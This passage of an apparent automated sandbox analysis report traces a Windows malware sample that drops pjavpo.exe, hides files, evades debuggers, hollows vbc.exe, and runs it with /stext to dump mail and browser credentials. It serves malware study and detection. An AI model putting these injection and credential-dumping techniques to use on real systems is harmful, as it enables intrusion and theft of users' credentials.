                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00442A90 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00442A90 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00446E54 push eax; ret
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: TGQfHfehsY.exeStatic PE information: real checksum: 0x0 should be: 0xab3f3
                Source: pjavpo.exe.1.drStatic PE information: real checksum: 0x2c4c6 should be: 0x22f88
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile created: C:\Users\user\AppData\Local\Temp\pjavpo.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Changes the view of files in windows explorer (hidden files and folders)
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E101 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 6820Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 2380Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 2560Thread sleep time: -140000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 6312Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeWindow / User API: threadDelayed 509
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeAPI coverage: 6.1 %
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: GetAdaptersInfo,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: GetAdaptersInfo,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 120000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 140000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeAPI call chain: ExitProcess graph end node
                Source: bhv8D09.tmp.13.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220311T105602Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9ebbac39d9a3402085c24368353fb3cf&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1417890&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1417890&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                Source: bhv8D09.tmp.13.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220308T094317Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0217a865f8f848fda01c81f53625784e&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1417890&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1417890&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004161B0 memset,GetSystemInfo,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00402630 FindFirstFileA,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00404A29 FindFirstFileExW,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_004035F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F983 _memset,IsDebuggerPresent,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00410AFA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E588 GetProcessHeap,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F55D SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F58E SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401E1D SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Sample uses process hollowing technique
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                .NET source code references suspicious native API functions
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
